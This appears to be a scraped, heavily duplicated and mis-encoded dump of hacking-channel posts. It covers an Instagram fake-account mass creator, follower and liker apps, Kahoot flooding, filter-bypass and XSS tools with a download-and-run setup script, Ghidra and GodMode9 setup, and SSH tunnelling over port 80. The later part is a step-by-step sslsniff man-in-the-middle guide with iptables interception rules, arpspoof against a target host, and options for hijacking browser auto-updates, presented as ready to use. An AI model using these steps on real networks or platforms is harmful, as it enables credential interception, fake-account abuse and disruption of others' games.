โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ CREATE UNLIMITED INSTAGRAM ACCOUNTS:
t.me/UndercodeTesting
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) git clone https://github.com/kaex/Insta-mass-account-creator.git
2) cd Insta-mass-account-creator
3) Example: php start.php -l 5 -p proxies.txt
4)t his script creates account with random name and username gets by the web. All user created are older 18 years
5) This script helps you follow multiple accounts with the account's you've created
Important
6) The new fake Instagram account with an unverified phone number after ~ 1-24 hours could not do any requests. All requests will be redirected to the page
https://instagram.com/challenge
๐ฆ TESTED BY UNDERCODE
> debian-parrot-kali
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ CREATE UNLIMITED INSTAGRAM ACCOUNTS:
t.me/UndercodeTesting
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) git clone https://github.com/kaex/Insta-mass-account-creator.git
2) cd Insta-mass-account-creator
3) Example: php start.php -l 5 -p proxies.txt
4)t his script creates account with random name and username gets by the web. All user created are older 18 years
5) This script helps you follow multiple accounts with the account's you've created
Important
6) The new fake Instagram account with an unverified phone number after ~ 1-24 hours could not do any requests. All requests will be redirected to the page
https://instagram.com/challenge
๐ฆ TESTED BY UNDERCODE
> debian-parrot-kali
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 INSTAGRAM FOLLOW EDITING & trackers APPS ios - android
we send before many sitres for inst follow- now customize your post and convert to amazing one:
> https://vsco.co/
>https://priime.com/
>https://itunes.apple.com/us/app/snapseed/id439438619?mt=8
> https://pixlr.com/
> https://itunes.apple.com/us/app/litely/id850707754?mt=8
> https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8
> https://www.crowdfireapp.com/
>https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8
> https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 INSTAGRAM FOLLOW EDITING & trackers APPS ios - android
we send before many sitres for inst follow- now customize your post and convert to amazing one:
> https://vsco.co/
>https://priime.com/
>https://itunes.apple.com/us/app/snapseed/id439438619?mt=8
> https://pixlr.com/
> https://itunes.apple.com/us/app/litely/id850707754?mt=8
> https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8
> https://www.crowdfireapp.com/
>https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8
> https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
VSCOยฎ
VSCO Photo Editor & Video Editor - Desktop & Mobile App
VSCO offers community, tools & exposure for photographers. Use our photo editor & video editor tools, connect with our global photographer network & get hired.
Forwarded from iUNDERCODE - iOs JAILBREAK & MODS
โ โ โ i๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆtop rated Instagram Apps for Followers 2020 :
ios-
we send before many sites for follow now it'sapps turn
t.me/iUndercode
>https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8
> https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8
> https://www.crowdfireapp.com/
> https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8
โ โ โi ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆtop rated Instagram Apps for Followers 2020 :
ios-
we send before many sites for follow now it'sapps turn
t.me/iUndercode
>https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8
> https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8
> https://www.crowdfireapp.com/
> https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8
โ โ โi ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE - iOs JAILBREAK & MODS
WELCOME TO iUNDERCODE CHANNEL FOR iOS UPDATES | TIPS | IPA & much more..
iUndercode.com
@UndercodeTesting @iUndercode @Dailycve @UndercodeNews
Follow us :
youtube.com/undercode
instagram.com/iUndercode
fb.com/iUndercode
Twitter.com/iUndercode
iUndercode.com
@UndercodeTesting @iUndercode @Dailycve @UndercodeNews
Follow us :
youtube.com/undercode
instagram.com/iUndercode
fb.com/iUndercode
Twitter.com/iUndercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆReverse engineering termux-linux :
t.me/UndercodeTesting
1) kahoot-flood - using an old school denial of service technique, this program automatically joins a game of kahoot an arbitrary number of times. For instance, you can register the nicknames "alex1", "alex2", ..., "alex100".
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-flood
2) kahoot-rand - connect to a game an arbitrary number of times (e.g. 100) and answer each question randomly. If you connect with enough names, one of them is bound to win.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-rand
3) kahoot-profane - circumvent Kahoot's profanity detector, allowing you to join with any nickname (but with extra length restrictions; it has to be short).
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-profane
4) kahoot-play - play kahoot regularlyโas if you were using the online client.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-play
5) kahoot-html - I have notified Kahoot and they have fixed this issue. It used to allow you to join a game of kahoot a bunch of times with HTML-rich nicknames. This messes with the lobby of a kahoot game. See the screenshot in the example section.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-html
6) kahoot-crash - trigger an exception on the host's computer. This no longer prevents the game from functioning, so it is a rather pointless "hack"
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-crash
7) kahoot-xss - since I discovered this security hole, I contacted Kahoot and they fixed it. This used to run arbitrary JavaScript code on the host's computer. This exploited a bug with the pre-game player list, which did not sanitize HTML tags. The exploit itself was rather complicated due to the fact that nicknames are limited to 15 characters.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-xss
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) First, you must have the Go programming language INSTALLED on your machine.
Once you have Go installed and a GOPATH configured, you can use the following command to install the dependencies:
2) go get github.com/gorilla/websocket
๐ฆ Android
Download Termux on Android device and type this command line:
> apt update
> apt install curl
> curl https://raw.githubusercontent.com/unixpickle/kahoot-hack/master/kh-tmux-setup.sh
> kh-tmux-setup.sh
>chmod +x kh-tmux-setup.sh
> ./kh-tmux-setup.sh
โ verified by undercoder
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆReverse engineering termux-linux :
t.me/UndercodeTesting
1) kahoot-flood - using an old school denial of service technique, this program automatically joins a game of kahoot an arbitrary number of times. For instance, you can register the nicknames "alex1", "alex2", ..., "alex100".
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-flood
2) kahoot-rand - connect to a game an arbitrary number of times (e.g. 100) and answer each question randomly. If you connect with enough names, one of them is bound to win.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-rand
3) kahoot-profane - circumvent Kahoot's profanity detector, allowing you to join with any nickname (but with extra length restrictions; it has to be short).
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-profane
4) kahoot-play - play kahoot regularlyโas if you were using the online client.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-play
5) kahoot-html - I have notified Kahoot and they have fixed this issue. It used to allow you to join a game of kahoot a bunch of times with HTML-rich nicknames. This messes with the lobby of a kahoot game. See the screenshot in the example section.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-html
6) kahoot-crash - trigger an exception on the host's computer. This no longer prevents the game from functioning, so it is a rather pointless "hack"
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-crash
7) kahoot-xss - since I discovered this security hole, I contacted Kahoot and they fixed it. This used to run arbitrary JavaScript code on the host's computer. This exploited a bug with the pre-game player list, which did not sanitize HTML tags. The exploit itself was rather complicated due to the fact that nicknames are limited to 15 characters.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-xss
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) First, you must have the Go programming language INSTALLED on your machine.
Once you have Go installed and a GOPATH configured, you can use the following command to install the dependencies:
2) go get github.com/gorilla/websocket
๐ฆ Android
Download Termux on Android device and type this command line:
> apt update
> apt install curl
> curl https://raw.githubusercontent.com/unixpickle/kahoot-hack/master/kh-tmux-setup.sh
> kh-tmux-setup.sh
>chmod +x kh-tmux-setup.sh
> ./kh-tmux-setup.sh
โ verified by undercoder
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
OFFICIAL NSA SITE:
> https://www.ghidra-sre.org/ghidra_9.1.2_PUBLIC_20200212.zip
OFFICIAL NSA SITE:
> https://www.ghidra-sre.org/ghidra_9.1.2_PUBLIC_20200212.zip
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Software reverse engineering by NSA
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) Extract the JDK: dl
2) Right-click on the zip file and click Extract All...
3) Click Extract
4) Open Environment Variables window:
5) Windows 10: Right-click on Windows start button, and click System
Windows 7: Click Windows start button, right-click on Computer, and click Properties
6) Click Advanced system settings
7) Click Environment variables...
8) Add the JDK bin directory to the PATH variable:
9) Under System variables, highlight Path and click Edit...
10) At the end of the the Variable value field, add a semicolon followed by <path of extracted JDK dir>\bin
Click OK
Click OK
Click OK
11) Restart any open Command Prompt windows for changes to take effect
Linux and macOS (OS X): Extract the JDK distribution (.tar.gz file) to your desired location, and add the JDK's bin directory to your PATH:
12) Extract the JDK:
tar xvf <JDK distribution .tar.gz>
13) Open ~/.bashrc with an editor of your choice. For example:
vi ~/.bashrc
14) At the very end of the file, add the JDK bin directory to the PATH variable:
export PATH=<path of extracted JDK dir>/bin:$PATH
Save file
15) Restart any open terminal windows for changes to take effect
๐ฆIn some cases, you may want Ghidra to launch with a specific version of Java instead of the version that Ghidra automatically locates. To force Ghidra to launch with a specific version of Java, set the JAVA_HOME_OVERRIDE property in the support/launch.properties file. If this property is set to an incompatible version of Java, Ghidra will revert to automatically locating a compatible version. Note that some Java must still be on the PATH in order for Ghidra to use the JAVA_HOME_OVERRIDE property. This limitation will be addressed in a future version of Ghidra.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Software reverse engineering by NSA
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) Extract the JDK: dl
2) Right-click on the zip file and click Extract All...
3) Click Extract
4) Open Environment Variables window:
5) Windows 10: Right-click on Windows start button, and click System
Windows 7: Click Windows start button, right-click on Computer, and click Properties
6) Click Advanced system settings
7) Click Environment variables...
8) Add the JDK bin directory to the PATH variable:
9) Under System variables, highlight Path and click Edit...
10) At the end of the the Variable value field, add a semicolon followed by <path of extracted JDK dir>\bin
Click OK
Click OK
Click OK
11) Restart any open Command Prompt windows for changes to take effect
Linux and macOS (OS X): Extract the JDK distribution (.tar.gz file) to your desired location, and add the JDK's bin directory to your PATH:
12) Extract the JDK:
tar xvf <JDK distribution .tar.gz>
13) Open ~/.bashrc with an editor of your choice. For example:
vi ~/.bashrc
14) At the very end of the file, add the JDK bin directory to the PATH variable:
export PATH=<path of extracted JDK dir>/bin:$PATH
Save file
15) Restart any open terminal windows for changes to take effect
๐ฆIn some cases, you may want Ghidra to launch with a specific version of Java instead of the version that Ghidra automatically locates. To force Ghidra to launch with a specific version of Java, set the JAVA_HOME_OVERRIDE property in the support/launch.properties file. If this property is set to an incompatible version of Java, Ghidra will revert to automatically locating a compatible version. Note that some Java must still be on the PATH in order for Ghidra to use the JAVA_HOME_OVERRIDE property. This limitation will be addressed in a future version of Ghidra.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTOP RATED 2020 FACEBOOK LIKER APPS :
FOR ANDROID
> https://fb-liker.en.uptodown.com/android
> https://play.google.com/store/apps/details?id=com.nam.fbwrapper&hl=en_US
> https://apental.com/
> https://www.facebook.com/apentalcalcdownload/
> https://play.google.com/store/apps/details?id=com.Plop.Fast.Followers.Boost.Get.Instant.Likes&hl=en_US
๐ฆ FOR IOS :
https://apps.apple.com/us/app/swipa-likes-for-photos/id1231810985
http://ios.dailydownloaded.com/en/internet-software/social-networking-software/23891-myfbliker-auto-like-download-install
https://apkpure.com/fboost-likes-for-facebook-quick-and-easy-guide/com.fboost_app
๐ฆ 2020 NEWS SITES / APPS NON VERIFIED HIGH RATED :
> https://apkpure.com/get-instant-likes/socials.com.application
> http://mylikelo.com/
By
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆTOP RATED 2020 FACEBOOK LIKER APPS :
FOR ANDROID
> https://fb-liker.en.uptodown.com/android
> https://play.google.com/store/apps/details?id=com.nam.fbwrapper&hl=en_US
> https://apental.com/
> https://www.facebook.com/apentalcalcdownload/
> https://play.google.com/store/apps/details?id=com.Plop.Fast.Followers.Boost.Get.Instant.Likes&hl=en_US
๐ฆ FOR IOS :
https://apps.apple.com/us/app/swipa-likes-for-photos/id1231810985
http://ios.dailydownloaded.com/en/internet-software/social-networking-software/23891-myfbliker-auto-like-download-install
https://apkpure.com/fboost-likes-for-facebook-quick-and-easy-guide/com.fboost_app
๐ฆ 2020 NEWS SITES / APPS NON VERIFIED HIGH RATED :
> https://apkpure.com/get-instant-likes/socials.com.application
> http://mylikelo.com/
By
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Uptodown
FB Liker for Android - Download the APK from Uptodown
Download the APK of FB Liker for Android for free. Get tons of Facebook Likes. FB Liker is exactly what you'd expect from an app with that name: an app...
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCIA TOOL- GodMode9 Explorer - A full access file browser for the Nintendo 3DS console :godmode:
T.me/UndercodeTesting
๐ฆ The recommended bootloader for use with GodMode9 is fastboot3DS. There are known issues for some users when using the standard setup based on boot9strap and Luma3DS. If you insist on using that setup follow the instructions found in a certain guide. Here's how to set up GodMode9 (and fastboot3DS) up quickly:
1) Download OpenFirmInstaller and follow the quick setup instructions found there.
> https://github.com/d0k3/GodMode9
2) Copy the gm9 folder from the release archive to your SD card. Then, get good versions of seeddb.bin and encTitleKeys.bin from somewhere (don't ask me!) and put these two files into sd:/gm9/support (optional but recommended for full functionality).
It is also recommended you setup the RTC clock if you're running GodMode9 for the first time.
3) Find the option via HOME button -> More.... Also keep in mind that you should fix your system OS clock afterwards. While you're in the More... menu, you may also set screen brightness to a fixed value of your choosing and manually calibrate the touch screen (not recommended - try the automatic configuration first).
Helpful hint #1: Go here for step by steps on doing some common tasks in GodMode9. Especially users coming from Decrypt9WIP or Hourglass9 may find this to be helpful.
Helpful hint #2: Never unlock the red write permission level unless you know exactly what you're doing.
4) You will notice that prompt when it comes up, it features a completely red screen. It is recommended you stay on the yellow permission level or below at all times to be completely safe. Also read more on the write permissions system below.
๐ฆ<A> button: The <A> button is the 'confirm' / 'choose' button. It confirms prompts and selects entries in menus. In the main file view, it pulls up a submenu for files and opens directories (use <R+A> on directories for a submenu, also including the invaluable title search). In the hexviewer, <A> switches into edit mode.
<B> button: The <B> button is the 'cancel' / 'return' button. Use it to leave menus without action, hold it on file operations to cancel said file operations.
<X> button: In the main file view, the <X> button deletes (marked) files. With <R+X> files are renamed.
<Y> button: In the main file view, the <Y> button copies and pastes files. With <R+Y> you can create folders and dummy files.
<L> button: The <L> button is the 'mark' button. Use it with <LEFT> / <RIGHT> to mark / unmark all files in a folder, hold it and use <UP> / <DOWN> to select multiple files.
<R> button: The <R> button is the 'switch' button. It switches buttons to their secondary function. Notable exceptions are <R+L> for a screenshot (works almost anywhere),
<R+LEFT> / <R+RIGHT> to switch panes and <R+DOWN> to reload the file listing.
<START> button: Use the <START> button to reboot from GodMode9. Use <R+START> to poweroff your 3DS.
<SELECT> button: The <SELECT> button clears or restores the clipboard (depending on if it's empty or not).
<HOME> button: The <HOME> button enters the HOME menu, including the scripts / payloads submenus, options for formatting the SD, setting the RTC, and more. The
<POWER> button is an alternative way of entering the HOME menu.
<R+UP> combo: This little known keycombo, when held at startup, pauses the GodMode9 boot so that you can stare at the splash screen for a little longer.
<R+LEFT> combo: If you have installed GodMode9 as your bootloader, this keycombo enters the bootmenu. Hold on startup! If you built GodMode9 as SALTMODE and have it as a bootloader, the keycombo is simply the <START> button.
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCIA TOOL- GodMode9 Explorer - A full access file browser for the Nintendo 3DS console :godmode:
T.me/UndercodeTesting
๐ฆ The recommended bootloader for use with GodMode9 is fastboot3DS. There are known issues for some users when using the standard setup based on boot9strap and Luma3DS. If you insist on using that setup follow the instructions found in a certain guide. Here's how to set up GodMode9 (and fastboot3DS) up quickly:
1) Download OpenFirmInstaller and follow the quick setup instructions found there.
> https://github.com/d0k3/GodMode9
2) Copy the gm9 folder from the release archive to your SD card. Then, get good versions of seeddb.bin and encTitleKeys.bin from somewhere (don't ask me!) and put these two files into sd:/gm9/support (optional but recommended for full functionality).
It is also recommended you setup the RTC clock if you're running GodMode9 for the first time.
3) Find the option via HOME button -> More.... Also keep in mind that you should fix your system OS clock afterwards. While you're in the More... menu, you may also set screen brightness to a fixed value of your choosing and manually calibrate the touch screen (not recommended - try the automatic configuration first).
Helpful hint #1: Go here for step by steps on doing some common tasks in GodMode9. Especially users coming from Decrypt9WIP or Hourglass9 may find this to be helpful.
Helpful hint #2: Never unlock the red write permission level unless you know exactly what you're doing.
4) You will notice that prompt when it comes up, it features a completely red screen. It is recommended you stay on the yellow permission level or below at all times to be completely safe. Also read more on the write permissions system below.
๐ฆ<A> button: The <A> button is the 'confirm' / 'choose' button. It confirms prompts and selects entries in menus. In the main file view, it pulls up a submenu for files and opens directories (use <R+A> on directories for a submenu, also including the invaluable title search). In the hexviewer, <A> switches into edit mode.
<B> button: The <B> button is the 'cancel' / 'return' button. Use it to leave menus without action, hold it on file operations to cancel said file operations.
<X> button: In the main file view, the <X> button deletes (marked) files. With <R+X> files are renamed.
<Y> button: In the main file view, the <Y> button copies and pastes files. With <R+Y> you can create folders and dummy files.
<L> button: The <L> button is the 'mark' button. Use it with <LEFT> / <RIGHT> to mark / unmark all files in a folder, hold it and use <UP> / <DOWN> to select multiple files.
<R> button: The <R> button is the 'switch' button. It switches buttons to their secondary function. Notable exceptions are <R+L> for a screenshot (works almost anywhere),
<R+LEFT> / <R+RIGHT> to switch panes and <R+DOWN> to reload the file listing.
<START> button: Use the <START> button to reboot from GodMode9. Use <R+START> to poweroff your 3DS.
<SELECT> button: The <SELECT> button clears or restores the clipboard (depending on if it's empty or not).
<HOME> button: The <HOME> button enters the HOME menu, including the scripts / payloads submenus, options for formatting the SD, setting the RTC, and more. The
<POWER> button is an alternative way of entering the HOME menu.
<R+UP> combo: This little known keycombo, when held at startup, pauses the GodMode9 boot so that you can stare at the splash screen for a little longer.
<R+LEFT> combo: If you have installed GodMode9 as your bootloader, this keycombo enters the bootmenu. Hold on startup! If you built GodMode9 as SALTMODE and have it as a bootloader, the keycombo is simply the <START> button.
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHACK WIFI AIRPLANE
> Using SSH through airplane WiFi that blocks port 22
instagram.com/UndercodeTesting
1) Many aircraft that offer wifi only permit access to machines on port 80/443, the standard http(s) ports. If you want to SSH, you have to set up an intermediate machine that hosts the SSH service on either port 80 or 443. An easy (and free) way to do this is via a Google free-tier micro instance.
2) These instances have a 1 GB transfer ceiling per month, but so long are you are only transmitting textual data a few days per month, this limit should not be easily exceeded. Set up one of these VMs via the Google Cloud console, and select CentOS 7 as the disk image. Make sure that you allow http/https traffic on the instance, the two checkboxes in the Firewalls section of the VM settings.
3) Optionally, set a static external IP address for your server in the VM config, in case you don't want to look up the IP each time. Then, ssh into the new VM (the IP address will be listed as the "external IP" in the list of instances) and edit your /etc/ssh/sshd_config file, changing the Port 22 line to Port 80.
4) By default selinux will only allow the SSH service to use port 22, so you have to change your selinux permissions as well. Enter the following commands into the VM:
> sudo su
> semanage port -m -t ssh_port_t -p tcp 80
> firewall-cmd --permanent --zone=public --add-port=80/tcp
> firewall-cmd --reload
> systemctl restart sshd.service
> Make sure that SSH is listening on port 80:
ss -tnlp | grep ssh
Example output:
LISTEN 0 128 *:80 *:* users:(("sshd",pid=1895,fd=3))
LISTEN 0 128 :::80 :::* users:(("sshd",pid=1895,fd=4))
If so, log out and attempt to SSH into your server on the new port:
ssh 123.45.67.89 -p80
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHACK WIFI AIRPLANE
> Using SSH through airplane WiFi that blocks port 22
instagram.com/UndercodeTesting
1) Many aircraft that offer wifi only permit access to machines on port 80/443, the standard http(s) ports. If you want to SSH, you have to set up an intermediate machine that hosts the SSH service on either port 80 or 443. An easy (and free) way to do this is via a Google free-tier micro instance.
2) These instances have a 1 GB transfer ceiling per month, but so long are you are only transmitting textual data a few days per month, this limit should not be easily exceeded. Set up one of these VMs via the Google Cloud console, and select CentOS 7 as the disk image. Make sure that you allow http/https traffic on the instance, the two checkboxes in the Firewalls section of the VM settings.
3) Optionally, set a static external IP address for your server in the VM config, in case you don't want to look up the IP each time. Then, ssh into the new VM (the IP address will be listed as the "external IP" in the list of instances) and edit your /etc/ssh/sshd_config file, changing the Port 22 line to Port 80.
4) By default selinux will only allow the SSH service to use port 22, so you have to change your selinux permissions as well. Enter the following commands into the VM:
> sudo su
> semanage port -m -t ssh_port_t -p tcp 80
> firewall-cmd --permanent --zone=public --add-port=80/tcp
> firewall-cmd --reload
> systemctl restart sshd.service
> Make sure that SSH is listening on port 80:
ss -tnlp | grep ssh
Example output:
LISTEN 0 128 *:80 *:* users:(("sshd",pid=1895,fd=3))
LISTEN 0 128 :::80 :::* users:(("sshd",pid=1895,fd=4))
If so, log out and attempt to SSH into your server on the new port:
ssh 123.45.67.89 -p80
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAUTOMATE MITM ATTACK- HACK ACC AND MORE...
T.me/UndercodeTesting
๐ฆREQUIRE :
openssl, libboost1.35-dev, libboost-filesystem1.35-dev,
libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) git clone https://github.com/moxie0/sslsniff.git
2) run "./configure" and "make". (You'll have
to make some changes to build on BSD systems, see below under "Setting up
pf")
๐ฆThere are two ways to run this: in "authority" mode or "targeted" mode.
A) Authority Mode:
1) In this mode, sslsniff acts as if it is a CA which dynamically generates
certificates on the fly.
> If you were, for instance, able to obtain a CA
certificate somehow, you could run it in this mode and it would dynamically
create and sign new certificates for whatever site you're trying to connect
to.
2) This mode is also useful for exploiting implementations that do not properly
verify BasicConstraints, as any valid leaf node certificate could be used
instead of a CA cert.
3) You would run sslsniff as:
./sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>
B) Targeted Mode:
1) In this mode, sslsniff is given a directory full of certificates, which it
uses for targeted MITM attacks against the hosts those certificates are
signed for.
2) This mode is useful if you are able to forge specific
certificates, or if you have certificates that were obtained for the "null
prefix" vulnerability that I published. There are sample null prefix
certificates in the "certs" directory that comes with sslsniff, but be
sure to specify "-m IPSCACLASEA1.crt" if you wish to use those. (Note:
the targeted certs have been removed for legal reasons, but the universal
wildcard cert remains)
3) You would run sslsniff as:
./sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt \
-c <$certDir>
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAUTOMATE MITM ATTACK- HACK ACC AND MORE...
T.me/UndercodeTesting
๐ฆREQUIRE :
openssl, libboost1.35-dev, libboost-filesystem1.35-dev,
libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
1) git clone https://github.com/moxie0/sslsniff.git
2) run "./configure" and "make". (You'll have
to make some changes to build on BSD systems, see below under "Setting up
pf")
๐ฆThere are two ways to run this: in "authority" mode or "targeted" mode.
A) Authority Mode:
1) In this mode, sslsniff acts as if it is a CA which dynamically generates
certificates on the fly.
> If you were, for instance, able to obtain a CA
certificate somehow, you could run it in this mode and it would dynamically
create and sign new certificates for whatever site you're trying to connect
to.
2) This mode is also useful for exploiting implementations that do not properly
verify BasicConstraints, as any valid leaf node certificate could be used
instead of a CA cert.
3) You would run sslsniff as:
./sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>
B) Targeted Mode:
1) In this mode, sslsniff is given a directory full of certificates, which it
uses for targeted MITM attacks against the hosts those certificates are
signed for.
2) This mode is useful if you are able to forge specific
certificates, or if you have certificates that were obtained for the "null
prefix" vulnerability that I published. There are sample null prefix
certificates in the "certs" directory that comes with sslsniff, but be
sure to specify "-m IPSCACLASEA1.crt" if you wish to use those. (Note:
the targeted certs have been removed for legal reasons, but the universal
wildcard cert remains)
3) You would run sslsniff as:
./sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt \
-c <$certDir>
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMITM AUTO Other options:
* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>
* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d
* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p
* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.
* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>
* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d
* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p
* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.
* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ AUTO MITM SETTING UP :
Setting up iptables
-------------------
1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)
2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)
3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)
4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)
5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)
6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)
๐ฆSetting up pf
-------------
1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.
๐ฆ Running arpspoof
--------------------------
1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.
2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1
At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.
โ VERIFIED BY UNDERCODE
@undercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ AUTO MITM SETTING UP :
Setting up iptables
-------------------
1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)
